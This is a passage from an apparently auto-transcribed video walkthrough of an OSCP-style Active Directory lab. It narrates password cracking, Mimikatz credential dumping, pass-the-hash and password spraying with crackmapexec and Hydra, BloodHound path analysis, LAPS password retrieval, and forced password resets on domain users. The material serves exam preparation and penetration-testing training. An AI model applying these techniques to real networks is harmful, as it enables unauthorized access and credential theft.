this and you just leave it as --rules, it's going to run through I guess actually not even --rules, but you just give it the hash, and you give it the hash, and I'm sorry, no other options other than the hash, and it will basically go through some incremental things. This can run for a long time, so I would suggest give it a shot. If it works, great, but if it's been running for, let's say, 20 minutes, then odds are you're not on the right path. This isn't going to work, and this is a dead end. So hopefully that's not the case, but we'll let this run for a while and we'll see what it comes back with. And bingo. So sure enough, with the rule set, we were able to get a hit. Welcome 111 with a capital W. Let's test it. So if we go ahead and go to our welcome letter, try and open that up. Let's use welcome 111. Oh, let's try that again. Maybe I mistyped it. Hopefully. Capital W. Oh, there it is. That was it. So it just goes to show, don't forget to use rules. And with a little variety of the RockU list, we found that welcome 111. And dear Stuart, welcome to Grew Industries. We're delighted to have you join our team. Oh, okay. Grew, doing a little Minions, Despicable Me theme here. So username Minions, password banana. Absolutely wonderful. Can we copy and paste this into our notes? We just found gold. So users, I'm going to guess this is our OSCP welcome letter. So OSCP Minions, perhaps. And well, let's see if I can paste. Sure enough, we can copy and paste text, just not files. So that is the first Active Directory credentials. Because yeah, sure enough, you can see if you need help, reach out to our support team at help@oscp.lab. So, oh, that might be another potential user. Mark that down. Help found in welcome letter. Wonderful, wonderful, wonderful. So now that we've got that, let's go ahead and minimize. We have, well, let's go ahead and save our notes. We can now start spraying some credentials against at least the domain controller. I still got to go back and rescan. Actually, let's do that next. Let's go ahead and rescan our MS02. So I'm going to go ahead and clear the screen. Okay, so at this point, what we need to do is restart that NMAP scan, because we didn't get any real results. I feel like that one may have been false. So let's go ahead and go back to MS02. And let's again run our NMAP scan against it and overwrite our previous log file. Okay, this time we're definitely getting at least a couple more ports open. So 445, there we go. Okay, so here we are definitely going to be able to start enumerating, because 445 is open on this one. And if we go back and look at our ports that were open on the domain controller, there wasn't anything out of standard there. I'm not even sure SMB was open. So we might be very limited to maybe SMB on this guy, and potentially maybe just the remote management ports for the domain controller. We'll have to see if SMB was also open on there. So let's go back, let's update our notes. So on here, we can now, ports and services, add 10.10.1.202, which is MS02. and 10.10.1.200 DC01. And for this guy, what we see here is we have TCP, let's see, 135, 139, which are pretty standard when SMB is open, 445, and 49668, which seems like part of the Windows RM. So remote management there, 668. Oh, and sure enough, there's our 5040 that we saw last time as well. So again, we at least have good old 445 that we can work with. So to try, now what we want to try is spraying credentials across DC01 and MS02. And by that, what I mean is MS02 is 445 SMB. And let's go back and take a look at what we have for, we'll just open up a new tab real quick. And review our ports that we saw open back here. So DNS, we can go ahead and update our numbers here for DC01. I'll just copy and paste and then update accordingly. So we also have so we have 25, no, sorry, not SMTP, 53. We have 88 for Kerberos, and 135, 139, 389 for LDAP. Okay, so we do have 445 open, so we do have SMB open. So add that to our to try, DC01. And I'm not going to go ahead and continue listing all the ports, but yeah, on a report, or if you were doing this for the sake of time, I would still continue to list this out, or at the very least we have it saved here. But for my 2 tries, I don't see, well, we also have the Windows Remote Management, which we can also actually spray creds at. So for that one, I'll say WinRM, because that's going to be all these high 49,000 ports. I'm not seeing anything else jumping out that we can spray, or it makes sense to spray. So for that, what we'll do is we're going to leverage adding in, well, first of all, we need to go get some more credentials. So Kevin and Stuart, ideally we want to get those and add them to the other passwords that we know. So we know about minions and banana, so let's go ahead and add that in. So here I'll go back to nano passwords. Oh, I didn't create that one yet. Let's paste the banana in. Nano users, minions. Actually, that's not true. Minions, Stuart, Kevin. We don't have their passwords at the moment, so let's go ahead and get those passwords. So let's run, since we're remote on our Kali machine, let's just run npacket secrets dump real quick. And this will, we need the credentials, so let's just run MS01/backdoor since we created that account, and it's got admin credentials and password 123 at 192.168.100.201. That should be all we need. Oh, okay. Apparently not. Did not like that. All right. Well, if you want to play like that, actually, let's just try. Okay, so it just doesn't give me permissions to do that. That's fine. In that case, we're going to go ahead and run Mimikatz on there. So let's go grab us some Mimikatz. So github mimikatz.exe. And x64. Let's grab this. And let's go ahead and go back to stage. Gonna move our Mimikatz there. Run our mpacket SMB server. Stage current. Okay. And then, oh, it looks like our RDP session died. So let's go back, hit up, hit enter. Bring me back in. Let me back in. Uh-oh. I wonder if our Windows machine crashed again. We might be having some stability issues there. All right. I'm going to pause the recording. We're going to reboot that machine. So this might be reboot number 2 if we were doing our exam. And we're back. So, yep, the reboot fixed it. And I just redid the agent to get our tunnel going again. I'm going to go back here and do session. In this case, 4. Start. All right, our tunnel is running once more. We have our RDP session restored. So now what we need to do is get our, let's see, okay, so we have mpacket running. Let's go ahead and 172.16.11.11. Boom, there's our stage. Sure enough, you can see we're getting credentials automatically, but it's just our backdoor account, so that doesn't help too much. And there's our Mimikatz. Let's copy that. Drop it back in our public folder where I like to stage my tools. Right-click, run as admin. Yes, please. And we're going to say log. We're going to say privilege debug. And then let's go ahead and do the, how about sec URL sa logon passwords. Give me the goodies. And let's see who we got there. So I'll usually go username. Lots of our MS01, oh, backdoor. Oh, there's Kevin. All right, so there's Kevin's hash. Let's go ahead and copy that. So we can use that to play past the hash. And I'm going to go ahead and save that over here. So let's go back. And, oops, too far. Nano hashes. In this case, I will just drop in Kevin's. All right, and let's go back. Let's see what else we got. Okay, that seems to be it, actually. So Stuart might not have been logged on. So the other one that we can try, so I usually do the sec URL sa, and then I also will, whoopsie, that was not what I meant to do. Dang it, I closed it. Let's open that back up. Privilege debug. Let's go ahead and log mimi2.log. And in this one, the other one I wanted to run was LSA, oh, dang it. LSA dump, I was getting it backwards. And then LSA / inject for the inject method. And let's see if we get, sure enough, there is Stuart. So now we can add Stuarts. So LSA is basically taking the LSA process and looking to see what we have saved in there. Oh, we also have the ladmin hash. Wonderful. So let's grab Stuart's. And let's grab ladmin. And we already have Kevin's. Guest default, don't need those. Backdoor, local admins disabled. Okay, so now we got all the local accounts. Odds are those aren't going to help us, but it's worth giving a shot in case any of them are shared across more than one computer. Alright, so I'm going to go ahead and actually copy hashes to, oh, what do I normally do? Hash, actually I'll just call it creds because we don't really have that here. And then I'm going to go ahead and delete these because we're going to spray these hashes. Alright, save that. So our friend crackmap exec that we ran earlier, again, we can use it to identify and say, let's run you against, I think we can do commas, 10.10.1.202. Let's see if we get fingerprints on both here. And it might not do commas, actually. I don't think it liked that. Let's do a dash instead, which we already know 10.10.1.201 is MS01, the machine we're on, that we're tunneling through. So that's, we can ignore that guy. But sure enough, we got responses back from both DC01 and MS02, fingerprints on the builds. They're all part of the same domain, so we can now spray credentials. So what do we have for our users? Let's update this. We also have ladmin. Kevin Stewart, ladmin, minions. Alright, that looks good. We have the one password. So let's just start this off by doing that and -u with users and -p with passwords. See what we get. Alright, so sure enough, it allows us to log on. That's why we get the plus. However, no admin rights, no pwned. So that's great. It means our credentials work. Oh, we should add continue on success, which means that's great if it gives you a positive result, but keep going. So yes, this worked, but go ahead and try Stuart with banana, Kevin with banana, you know, see if there's any password reuse, which nope, they all had logon failed. So no success there, but it's worth trying. So don't forget that flag. Now, if I remember correctly, we can use crack map exec smb and -- help. There should be an option for using our hashes, which is probably -h. But let's just double check. Yep, sure enough, --h. The hash itself or a file containing our NTLM hashes. So, and now instead of doing -p passwords, we're going to do -H hashes. And it doesn't look like that's getting us anywhere. So no bueno there, unfortunately. Okay, so we tried. We're not getting any success. Let's try the same thing. Well, actually, we tried them against all the hosts. So we tried those credentials. Let's try this against winRM, which is, I believe, only running on the domain controller based on the ports we saw. But we'll do 10.10.1.200 to 10.10.1.202. Let's see what we get for feedback. Who responds? DC01 responded. And that's it. So, and that's on port 5985. Okay, in that case, let's go ahead and just try the same thing. So, actually, let's just go up. Reuse our hashes. All we need to change here is winRM. Nope, nothing there. Okay, and how about -p passwords? What do you think? Nope, no luck, no banana. Okay, so for the sake of time, I'm going to jump ahead a little bit. One of the tools that I will use, if I don't get any quick hits, any quick wins, is BloodHound. But to do that, we actually need another tool to collect the data called SharpHound. So we're going to go ahead and search for GitHub SharpHound. And sure enough, here it is under BloodHound AD. On GitHub, we can go to releases, and there is SharpHound 2.0.2. Now, I ran into an issue when I was playing with this earlier, and so we're going to do something here where this is, you may run into this as well, so that's why I'm going to show what I experienced and also maybe some of the backup solutions or my way of fumbling around and getting a working solution. So I downloaded version 2.0.2. You'll notice that as of recording, it was released 2 days ago. There's also 2.0.1 and 2.0.0. I'm going to go ahead and download version 1.1.1. So that was the previous big build back from May 23rd, 2023, before they did the overhaul to 2.0. So if we expand the assets and we download that as well. So now we've got both of these in here. Let's go ahead and go back and let's go to our staging folder and let's move our downloads of SharpHound here. And let's go ahead and unzip both of these. Whoops. 2. Oh, and you know what? Actually, it dumped them all into into the current directory. That's not quite what I wanted, but that's fine. So let's make a directory. Actually, you know what? We're just going to remove those files. Okay, and we should still have npacket running. So let's go back to our Windows machine. Let's go back to our share. So 1111 stage, and let's copy both of those SharpHound folders, those zip files, I should say. And we'll put them back in our, again, staging directory under public. Let's paste. And I'm also going to unzip each one. They'll have their own directory, so 202 and 111. You may ask, well, why are you doing both of these versions? And you're going to see why. Because originally, what most of us do is we like to run the newest versions, and the newest versions should be reliable, should always work, but what happens when they don't, right? You want to have a backup plan, and ideally, you should be practicing with BloodHound and SharpHound when you're preparing for your OSCP, so you should kind of have familiarity with what's normal and what's not. Okay, so now that we have those here, the next thing we need to do is actually run these and collect data. So the whole point of SharpHound is it's the data collection or data gathering tool that's going to talk to Active Directory, pull down all the data, and save it so that we can enumerate through it later with BloodHound. So let's go ahead and run another command prompt. The problem, though, is that we're running as, well, when we say, who am I, right? I am MS01 backdoor. That doesn't have any access to Active Directory. We need to run this as the user that does have access to Active Directory, the account that we just enumerated earlier, and that's our minions, right? So let's do a good old run as user OSCP /minions. And what are we going to run? We're going to run cmd.exe. And let's use our password that we found. If I typed it in right. Nope, I did not. Oh, that's the nice thing about sharing the clipboard. We should be able to just do a quick copy. And in Windows command prompt, just right click. And that should paste. And it did. So now you'll see, who am I? I am OSCP minions, and it also shows in the title bar here. So let's go ahead and navigate back to our users public directory where we're staging our stuff. And then let's go ahead and go into SharpHound. Let's start with 202, and we'll see how much I remember here. What we want to do is run sharphound.exe, but we need to give it some flags or some variables. So I believe it's -c, and again, check this. You should use this multiple times to get familiar with it, but you also can refer back to documentation. I'm going to try and go off memory here. So I believe it's -c for collection methods. We're going to do all. Let's gather all the data. --domain for who are we going to look for. We're going to go and look for oscp.lab and talk to that domain controller. And then what was it? Zip file name, I believe it is. We'll call this one sharp202.zip. And if I did that right, it looks like I did. Otherwise, it would have spit out an error message. It's going to go ahead and collect data. You can see here it's doing all of the collection methods. It's running the scan, talking to the domain controller DC01, and it's currently basically waiting for the consumers to respond back with the data that we asked for. So I'm going to go ahead and pause. This usually does take a few minutes, potentially. It just depends. So we'll pause and resume after it's completed. And sure enough, it didn't take very long, and you can see it pulled 63 named as SID mappings, 3 machine IDs, 2 SID to domain mappings. So congratulations, we gathered some data, and if we check here, it's saved basically a bit.bin file and the .zip file, which is really what we're interested in. We're going to go ahead and do the same thing, but now we're going to run it in version 111, so that way we're going to collect the data from both versions of the collection tool. So I'll just hit up, and in this case, all we're going to do is change the zip file name to sharp111 and let it go ahead and run. Same thing, I'll give it a quick pause and we'll resume here shortly when it finishes. or actually better yet, while it's doing that, instead of pausing, let's multitask. Let's go back over here to our Kali box, where we're going to actually need to install two things. I don't believe BloodHound is installed by default. Nope, it's not. And I'm sure its database is not either. So let's go ahead and do sudo apt install yes neo4j. That is the, well, actually we're going to run sudo apt update. Looks like I probably haven't ran that recently. At least not since I deployed this Kali image. And after you run update, then you'll have your updated mirrors. I mean, odds are you should have already done this, updated your build, updated your applications. Now we can go ahead and run that same command for installing neo4j. It's going to download and pull that. Neo4j basically is the database that BloodHound's going to use to dump the data and then parse through for graphing. So we'll go ahead and let this install. I'm sure our SharpHound finished its data gathering. And now that we installed neo4j, we can install, and I could have done this with one command, but I'm doing it separately just so that you can see. Next, we'll go ahead and install BloodHound. You could have just done install yes, neo4j, and then BloodHound after that, and it would install them concurrently. Okay, now that we've got that going, we're going to go ahead and actually before we run things, let's collect our data and put it back where we want it. So let's copy this and let's go to our staging on Kali and we'll just paste it in there. And then let's go back here to version 2. Let's copy that file and then go to our stage and paste it on Kali. So now we have both of those zip files. And that's all we need. In case you're curious, you can look in here. And these are basically just containers for JSON files. That's the files that are inside of the zip. Okay, so now that we have that, we can run sudo, I'll run sudo neo4j start. And it's the first time this is ran since we just installed it. So it says, okay, by the way, here's the directories that are going to be in use. Here's the PID or the process ID for neo4j, and its web console or the management console is available localhost port 7474. But you know, there's a delay. So we'll go ahead and just open that link. And looks like the database is there. Leave this empty for defaults. The default credentials is neo4j and neo4j for the basically the same thing for username and password. I'll say never save. And it's going to say, oh, this is the first time you logged in. Let's change that password. So I'm going to go ahead and change it. And write it down or save it somewhere in case you don't remember. And essentially at this point, the database is ready to go and responsive on this protocol localhost. But in this case, it's listening on 7687 versus the manager, the web console, listening on 7474. At this point, we just need to run BloodHound. And it's going to pop up, and what you're looking for is this green check mark to say, yep, I connected to port 7687 and I found a database listening, so I'm ready to go, but give me credentials. And that's the neo4j and the password that we just set it to. I'll go ahead and say save password so I don't have to remember to punch it in there. And sure enough, here is BloodHound, ready to go, empty sandbox, no data, because there's nothing in there. If you click on the 3 hamburgers, you'll see that there's 0 statistics. I'm not going to go and walk through all of BloodHound. That's a whole nother session all by itself, and there's plenty of resources out there. What I will say, what we're going to do is now that we've collected the data, we need to use that data. So if we go back here, you'll notice, okay, hey, we grabbed both versions of the file. Why did we do that? Well, the last time I played around with BloodHound and tried this with the new SharpHound image, or maybe it was even SharpHound, here's what I did. And here's what you should be able to do. You should be able to drag and drop this zip file. And it should go ahead and upload the zip extract these JSON files, and you'll see it started to. It recognized the JSON files, but they just sit here at 0% and nothing ever processes. Just hangs here forever. So what I'm going to do is close that. We're going to run BloodHound again. In this case, it'll auto log in since I said save the password. And you'll notice BloodHound loads. No query, no data returned. And so sure enough, thankfully, nothing's broken. It seems like it just failed to load the data. So what we can do now is try again. But in this case, let's use version 1.1.1. It's been around for a few months longer. It's one that plenty of people have used. We drop that in, and sure enough, it acts accordingly. So if you're running into this on the OSCP exam, again, don't freak out. Fall back to what you've been doing before. Well, what changed? Did the version change? Okay, try an older version of SharpHound. Did the PowerShell .ps1 file fail? Go and use the executable, or vice versa. Did the executable fail to collect the data or corrupt the data? Then maybe use the PowerShell script. There's lots of options available to you. So as you see, it finished processing. I'll go ahead and say clear finished, close the upload progress, and now everything is loaded in here, the statistics, the relationships, the ACLs. But you'll notice the screen is still empty. What are we here to do? What are we going to do? There's a few things I always like to look at. One of them is go here to analysis. There's lots of pre-built shortcuts here. This is something that you should get comfortable with. Play around with these things. Use different boxes to hack, to practice these on that have Active Directory. But the first easy one is just find all domain admins. Tell me who the domain admins are. That's always a good thing to know. And go ahead and scroll out. Oh, another thing I'll change. Settings, the edge label display, I will say always. You'll notice that will change the line, always show the text on the line. Same thing for the nodes, the dots here, always. And then that'll pop up regardless of if you're zoomed in or not. Hey, there's a dark mode too. A little bit easier on the eyes. Okay, so here we're seeing something interesting. So in domain admins, we have 2 members, administrator. Well, okay, that's a default. But what's not default is GRU. Again, love the references. This is definitely on the Despicable Me theme. Good old GRU, which would make sense. GRU is the boss, so he would be a domain admin. All right. We haven't seen GRU's credentials at all, so this is something that we're starting to enumerate. We just discovered. I would usually take a note of that in the notes. Hey, this is a new user we found, but we've got lots of things to look at. One of the first things that I would do is to say, well, we already know of one user that we own, right? We pwned minions. We have minions. So let's go ahead and punch in minions, because you can put any query in here. I just typed it in and it auto completes, pops up and says, hey, are you talking about minions at oscp.lab? Is that who you're referencing? Yeah. Let's click on that. And here, okay, cool. Here's your minions. What do you want to do about it? What do you want to know about them? You can click on it and great. Let's see, effective inbound GPOs. We can look at GPOs, default domain policy. Oh, hey, OSCP GPO. That's not default. Again, if you've looked at a few of these things before, you'll know that there's always a default domain policy, but OSCP GPO, that is not default. That's custom. You can click on that. Let's see. Here's a bunch of data, inbound controls, who's it affecting. So you can spend some time enumerating and just analyzing Active Directory here. But to get more to the point of, well, what do we want to do? I want to go over here to minions. I'm going to right click minions and say mark user as owned, because we own that. From there, one of the first things I'll do, and I'll do that for all of the accounts, all the domain accounts that we have access or credentials to. In this case, we really only have access, we only know about minions, but I would do the same thing for any others. Then I'll go over here under the analysis and shortest paths. Shortest paths is fantastic. It's got all these different shortcuts for different goals or destinations or purposes, tactics, if you will, that you want to check. In this case, we're going to talk about owned principals. We just marked minions as owned. That means it's an owned principal. how about shortest paths to domain admins? I like that, from owned principals. If we click on this, BloodHound's going to look at all the data, and it's going to say, is there a way to get from minions all the way to a domain admin? If there is, we're going to get a result here. If there's not, then okay, maybe a blank screen. We may not get any valid method, but let's try it. Let's see what happens. And it's going to ask us which domain admin group. Well, there's only one, the default domain admins right now, so let's click on that. And sure enough, no data returned from query. So as far as what BloodHound could enumerate, or what it could tell, yes, we have minions as owned, but there's no direct way that it could see for us to get from minions over to domain admins. But that doesn't mean that we should give up. You need to do some manual review of the data as well as some investigation. So oftentimes I'll also look at what is the shortest path from owned principals, domain, and then of course what's the owned user, minions. It's the only one that we own right now. Oh, okay. So this came back with some interesting data. This came back and told us that Minions is a member of Lapse Users, which is a group in Active Directory, not a default group, but one that's been created. And okay, and we have, because we're in that group has permissions to read the Lapse passwords for MS01 and MS02. Again, you should be familiar with Lapse when you're studying for your OSCP, and this is the local administrative password service that manages those passwords. So this is a way for us to get privilege escalation once we're on the box. It won't give us the ability to move laterally per se, because you won't be able to use these credentials directly for, let's say, right now psexec would be the one for abusing the SMB protocol that's open. We already own MS01, so this really tells me that we should focus in on MS02, because this is definitely a fantastic privilege escalation for MS02. How do we abuse this privilege? Well, you can, if you're not familiar, when you're in BloodHound, you can right click on that read lapse password or whatever the permission is, if it's something that you can abuse, and hit help. And it's going to give us info to say, hey, this domain group has the ability to read the password set by lapse on the computer MS02, and uses this LDAP attribute. And if we're on Windows, cool, here's some PowerShell code that we can, some script that we can use. We're on Linux though, although actually we could do this from MS01 with that. But it looks like from Linux, from our Kali box, there's a tool called PyLapse that we can use, and a quick and easy command. Oh, it looks like it's Python. So that's fantastic. Let's abuse this. We know that this is going to give us privilege escalation, but I don't think it's going to give us the lateral movement. But let's make sure that this works. Let's make sure this is valid. So let's go ahead and try this PyLapse. And let's go. Okay, so here's the Python file. Looks pretty straightforward. Yay, great, it's in Python 3. We can just go ahead and download it. We'll keep it nice and easy. Let's go back to our command prompt. Actually, since we're already running BloodHound there, I guess we can just go ahead and split things again. So we'll just say split vertically, move BloodHound all the way over, and now in here we can, let's go back to AD, and this, we're going to abuse this on MS02. So yeah, let's go ahead and go to MS02 exploits. And let's move the downloads. What do we just get? PyLapse to here. Let's run Python and check to make sure it actually runs. Hey, great, it does. Okay, so it looks like we can go back to BloodHound and check. So -- action. Matter of fact, we can just copy this out. Looks like -u and -p. Okay, that's pretty straightforward. So Python, Pylapse. And domain is going to be oscp.lab. The -u for user is going to be minions. -p for our password. So in this case, our password, banana, actually has exclamations in there, which are not going to be interpreted as direct exclamations. So if we just leave it like that, it's not going to work. We actually need to break. So put a backslash in front of each one of these, so that way it'll actually interpret them as exclamation marks. And actually, just for giggles, let's put it in quotes there too. You'll notice that when we do that, if we take away the breaks, they show up in blue, which is also kind of an indicator saying, hey, I'm going to actually interpret those differently. Here it's in purple when we put the backslashes, saying we're going to interpret them literally. And so we got user password. What are we missing? Oh, so it's going to try and go by the DNS resolution. Since we didn't add oscp.lab to the hosts file, we want to do the --DCIP so we can specify the domain controller. So that way it doesn't have to look it up through DNS. We are telling it who to go talk to and request this from 10.10.1.200. And let's, fingers crossed, let's see what we get. Okay, it looked like that came back. Connection refused. Let's try that again. Oops. Dang it. Okay. There we go. Okay. For whatever reason, try it again. Try it again. Okay. Apparently I was having a fluke there. But looks like now it pulled. So this is beautiful. This confirms exactly what we had hoped. We now just extracted or requested and retrieved the local admin passwords for MS01 and MS02. So let's save these. Actually, we don't need the one on that's not it, on MS01, because we already own MS01. However, we'll document it here anyway. MS02 admin, because again, what we're not seeing, if you hadn't picked up on this, is it doesn't tell you what the username is for laps. But this is something that you should become familiar with if you do some research or you play with laps. So if you build this in your own lab, then you'll realize that to configure laps, it's going to use the same username across all of the machines. So that's where when we saw ladmin on MS01, we're going to bet, we'll only be able to find out once we land on there and we test this, but we're going to bet that it's ladmin on MS02 because all we get are the passwords. We don't get the usernames. So keep that in mind. If we're wrong, then we need to land on MS02 and enumerate for any other local users, and then just spray this password against any of the other users if it's not ladmin. I believe it is, but keep that in mind that if you fail, look for any other local users to try it against, because it will be a local user. All right. Now we understand how we can get privilege escalation once we get on there. But how do we get on there? That's, again, if we were to try and use this, let's go ahead and test it. So let's clear. If we said impacket psexec, and then we said, yep, here we go, MS02 /ladmin at 10.10.102 or 10.10.1.202, we can hit that. It'll ask us for the password. Copy, paste clipboard, hit enter, and we get rejected. And just for good measure, let's go ahead and do this with that. Paste clipboard. Okay, so here, interesting, right? So this definitely was a bad syntax. This was better because here it said, yeah, We allowed you to log on. We requested shares. And unfortunately, while that credential is good, you do not have access to admin or C drive as writable. So again, tells me that there's some restrictions. So this is not going to give us lateral movement, but it should give us privilege escalation. Matter of fact, we can test this out if you're not sure. Again, if you're comfortable, I would move forward, but if you're ever not sure, we know what MS01's LAdmin credentials are. We just retrieved that password. Let's try that. We can go back here. Let's say run as /user. And in this case, it's going to be MS01 /LAdmin. Let's just run CMD. And here we can, just to make sure, because again, we won't be able to see it if we paste. Yep, there's the password. Actually, we don't need, and right click, so it should have pasted. Enter, boom. Running as LAdmin. Who am I? LAdmin. Who am I /all. These are all my privileges. So right off the bat, and yep, your built-in administrators. So that validates. Once we get there, we can get onto MS02 and then Priv onto the local admin on there, the LAdmin. But again, as we validated, it's not going to work for lateral movement. So hopefully I beat that in. Everyone understands. If not, you probably fast forwarded as soon as I showed BloodHound again. So let's continue to enumerate with BloodHound. We verified this is good. This is Priv. What's next? So we can't use LAdmin in here because this is domain attributes, domain permissions, domain values, and metrics. So let's go back to our node info. I'm going to go back and focus on minions because, again, from an AD standpoint, that's the only account that we currently own. So here we can see our session. We talked about this. We looked at the effective inbound GPOs. Let's continue to look through here, see what else we have. So properties, this is fine. Just not, and none of this is set, so nothing's jumping out at me. First degree group memberships, there's 2. Nothing special here. Domain users is default. The lapse users, okay, cool. That is new. Well, that's not new. I'm sorry. That is something that's not default. However, it's not new. We already found that out. We found out what permissions that gives us, so not helping. Local admin rights. So unfortunately, it didn't validate. Oh, actually, no. There's no local admin rights for minions, unfortunately. But here we have something. Okay, so inbound and outbound object control and control rights. These are 2 areas you should definitely take a quick look at when you're evaluating what the owned principal or the owned user has access to. So let's look at the first degree object control. Oh, hello. Okay, this is good. This looks fantastic. Minions has the permission to force a password change for Lucy and for Dr. Nefario. This is beautiful. This is exactly the kind of thing that we're looking for. Because now this says Minions has some control over Lucy and Dr. Nefario. 2 new users. 2 new users. All right, so what are we going to do? If we want to find out how to abuse this, we're going to right click, say help. Here we have the Windows abuse, and it's going to tell us, okay, there's a few ways to do this. DFM.A, or net users 1. However, it's got some pros and cons. If we go here to Linux abuse, we can immediately see, hey, Samba's net tool can change the user's password. The credentials can be supplied in clear text or prompted interactively if they're omitted from the command line. The new password will be prompted if omitted. Beautiful. This is what we want. All right. So let's take this and let's change this to be what we need. So what I'll do is I'll usually copy it. Let's go back to our mouse pad drop this in, and let's change. So target user, let's start with Lucy. The new password, let's go ahead and change this. Again, we're going to have to meet minimum password requirements. So let's just do a good old password 123 exclamation. Actually, do @. Here we're going to set the domain. So that'll be OSCP. The controlled user. Oh, so that is the one that we have access to. So that's minions. And minions' password. That's weird to say minions password. Let's go back here. Copy. Paste. And then the domain controller. So that's going to be our 10.10.1.200. All right. Let's see if we got this right. Paste clipboard. Oh, we're definitely going to have to do that again. All right, we didn't get any confirmation or anything. Is that normal? I don't know. Let's... Because it says if the new password is omitted, then it'll ask us. So just for giggles, let's go ahead and try that. Whoops, didn't want to open a new one. I always like to try things different ways, play with them, see what happens. Verify. Yep, enter new password for Lucy. So I will say paste selection. Boom. Okay. Fantastic. So let's do the same thing for Dr. Nefario. That one was Dr. _Nefario. Okay. Actually, we'll go up and do this one where we have the password in there. Dr. Nefario. Enter. Boom. Okay. I think we just got control. So now, a couple things that we're going to do. Well, first thing we're going to do is go in here. We're going to mark Lucy as owned. We're going to mark Dr. Nefario as owned. And I'm immediately going to go back here to analysis, scroll down, and shortest path to domain admins from owned principals. Fingers crossed. Nothing. Okay. I was hoping we might get lucky and it would say, oh yeah, Lucy or Dr. Nefario can get directly here. That's not the case. So what's the next thing that we need to do? Next thing we need to do is start to add these credentials back into our notes. So OSCP / Lucy is now set to, oops. Didn't mean to paste the whole command. And we also did the same thing for Dr. Nefario. So what do we do next? We take those two users and we add them to our passwords. So let's go ahead and clear again. And let's do nano, oh, I need to back up. Nano passwords. And let's paste that in. Oops. I guess I'm doing it backwards. That's okay though. We will take this password that we set. We're going to go ahead and add it in there. Paste clipboard. Save it. Nano users. And add Dr. Nefario. And Lucy. Okay. Wonderful. Next thing we're going to do is continue to do some spraying. But I immediately am coming to mind and I'm thinking, well, wait a minute. I pretty much know, or I don't know, but I have a good idea where I should be going next. Because we know that we have an ability to Priv onto MS02 once we get there. However, if I remember correctly, we only had a couple of ports open, and we also had an issue with scanning. So you know what? I'm just going to run a scanner again. I just don't. When in doubt, run the scanners again and again. Double, triple validate. You know, we had 2 different results from running the scanner of NMAP against MS02. So you know, let's do it again. Let's see if we can get 2 results that match, and we get the same thing twice. So let's go to MS02. Let's run sudo nmap dash. Let's see, pn dash v for verbose dash b dash for all ports. Let's go somewhat fast. We'll do T4, and we're going to go against 10, 10, 1, 202, and we're going to send this out to nmap format of enu, nmap ports. Let's do, how many of these do we have? Just 1. Okay, let's do nmap ports 2. Then we can even do a diff on there and see what's different. All right, so that's, well, actually, wait a minute. I don't, was that open earlier? Okay, if it was, we definitely missed it. 139, 445, 135, 3389. I would have, yeah, okay, that's a big deal. That's another port that we want to hammer with credentials. So 3389. When we talk about spraying credentials, yeah, we definitely didn't, because we only listed 1 here, so we need to add in 3389 RDP. Okay, let's go back. Let's see, status 31%. Okay, while that's running, let's go ahead and split this vertically again and run some scans. So again, I'm pretty much just going to target MS02. Let's start back with crackmap exec, and in this case it's going to be SMB 10.10.1 202. We're just going to go against the 1. Oh yeah, there we go. We have our last command. So users passwords. Yeah, let's see what we get. Oh, we need to take off the local auth because these are domain users actually. So continue on success. Oh, it's because we don't have any files. So if you're wondering why it's only doing 1 try, it's because we don't have those files, users and passwords, in the MS02 folder. So it's actually just taking and saying username users, password passwords, and using that literally. So let's back up. And now you'll notice that these are bold, letting us know that those are files. So now we have multiple, well, we have contents, so multiple credentials to try. I was having a hard time understanding why that wasn't working. Okay, so this is great. It doesn't necessarily change anything per se from what we knew, but it validates that, yep, our password changes were correct. So now Dr. Nefario and Lucy with that password 123@ do work. So we know that password change again has been confirmed and was successful. So at this point, I believe there is the ability to list shares with SMB. So this is crackmap exec, by the way, is fantastic. It's got so many different utilities and methods and things that you can do with it that, oops, that's not what I meant, -- help. One of the ones we can take advantage of here is I want to see, do these users have different access? Is there any different file shares that are visible based on credentials? We could log into each one and try. So we could basically do like an SMB client and log in with Lucy, and then log in again with Dr. Nefario, and then log in again with minions and see if there's different shares available. Or we could run crackmap exec with this -- shares option. And that, if memory serves, will actually check the share list for each one of our successful users, because we're going to continue on success. Oh, maybe not. Or I'm using it in the wrong spot. There we go. So dash dash shares, how about dash dash continue on success? So it just doesn't like that. Okay. There's probably a way around that so that it will enumerate for each one of the users, but I guess another way that we can do this very quickly is, so we did that with users and passwords. What if, well, if we just want to do it one at a time, and we already know which successful users we have, I'll just do them manually with all those passwords. So we could say Dr. Nefario. Oops, and let's take off the continue on success. And by the way, if you didn't notice, so with minions, default shares, admin $, IPC, nothing's out of the ordinary there. Read permission, same thing, that's totally defaults. So Dr. Nefario, same thing. How about last resort? Let's see if Lucy gets anything. No. Okay, I know there's quicker and better ways to do it, but I don't remember off the top of my head. So at the same time, our port scan finished, and going back against the list we saw earlier, I'm not seeing anything different except for the 3389 that we missed. But that's fantastic, because otherwise I was going to say we're stuck again. We have no other ports to run these credentials against, but we do. RDP. So fingers crossed. Hopefully one of these users has the ability to RDP in, and that would be fantastic. That would be our lateral movement. So we'll go back up here. We're going to remove shares, and we're going to change SMB to RDP. Let's see what happens. Now you'll notice RDP with CrackMap exec is not the most reliable, so oftentimes what I'll do is I'll actually run CrackMap exec once, and then I'll also concurrently or sequentially right afterwards run Hydra, and hopefully you get the same results with both, or at least hopefully you get a successful result with one or the other. Otherwise this goes back down to check manually, right? Do it manually. All right, so it looks like minions failed. And as this is going, as I just mentioned earlier, I usually will have two of these going concurrently, one with that, one with Hydra. So, all right, let's go ahead and clear this. Let's run Hydra. And if you're not familiar with Hydra, just do it, whoops, -H for help. And it even gives you a couple of examples here. Similarly, be careful about your lowercase and uppercase flags, because they are treated differently. Let's first of all get lower to the directories where our folders are. We'll run Hydra uppercase L for a file that contains our users, called users, and -P and the passwords for, again, P for a file with passwords inside of it. And then it's really easy. We'll just run RDP : / and our target. So 10.10.1.202. Let's see what happens. Oh, hey, beautiful. Look at that. So again, this is why I run two of these concurrently, and especially RDP. I don't know why, but RDP is not a fantastic protocol, and that you get a lot of reliable results when you use CrackMap exec, or many tools, I guess, for that matter. So you can immediately see we did, thankfully, otherwise I was going to be angry, get a successful result. So minions failed, Dr. Nefario failed, but Lucy, nice and bold here, succeeded. Lucy has RDP access according to Hydra. You'll notice that CrackMap exec is still going super duper slow, but I'm going to immediately go ahead and try this with xfree RDP, which we've already used once against our MS01 target. However, we need to change this to now target MS02, and our domain is OSCP. And our target is 202. Okay, fingers crossed. Whew. See what happens. Okay, it did not like that, and I know why. It's because I'm silly and I forgot to target the right address. There is no 192.168.202. There is a 